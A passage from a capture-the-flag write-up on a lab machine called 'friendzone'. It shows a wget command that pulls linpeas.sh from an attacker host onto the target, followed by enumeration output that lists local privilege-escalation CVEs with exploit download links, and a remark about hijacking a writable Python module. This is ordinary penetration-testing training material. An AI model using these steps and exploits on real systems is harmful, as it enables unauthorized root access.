PEAS
www-data@friendzone:/dev/shm$ wget http://10.10.14.11:8000/linpeas.sh ; chmod 777 linpeas.sh
--2023-01-26 09:01:50-- http://10.10.14.11:8000/linpeas.sh
connecting to 10.10.14.11:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 827827 (808K) [text/x-sh]
saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 808.42K 2.49MB/s in 0.3s
2023-01-26 09:01:50 (2.49 MB/s) - 'linpeas.sh' saved [827827/827827]Delivery complete over HTTP
Executing PEAS
PEAS also enumerated the sudo version, which is fairly old and potentially vulnerable
Potentially.
[+] [CVE-2021-3156] sudo Baron Samedit
details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
exposure: probable
tags: mint=19,[ ubuntu=18|20 ], debian=10
download url: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
exposure: probable
tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
download url: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
exposure: less probable
tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
download url: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
details: https://www.openwall.com/lists/oss-security/2022/08/29/5
exposure: less probable
tags: ubuntu=(20.04){kernel:5.12.13}
download url: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
exposure: less probable
tags: ubuntu=20.04{kernel:5.8.0-*}
download url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
exposure: less probable
tags: mint=19
download url: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
exposure: less probable
download url:
comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2019-10149] raptor_exim_wiz
details: https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt
exposure: less probable
download url: https://www.exploit-db.com/download/46996
[+] [CVE-2017-0358] ntfs-3g-modprobe
details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
exposure: less probable
tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
download url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.PEAS also find a list of vulnerablities
I can see that the target system has a compiler installed.
More detailed view on the SUID binaries
The Python os module is writable?
I may be able to hijack it if there is any Python script that uses it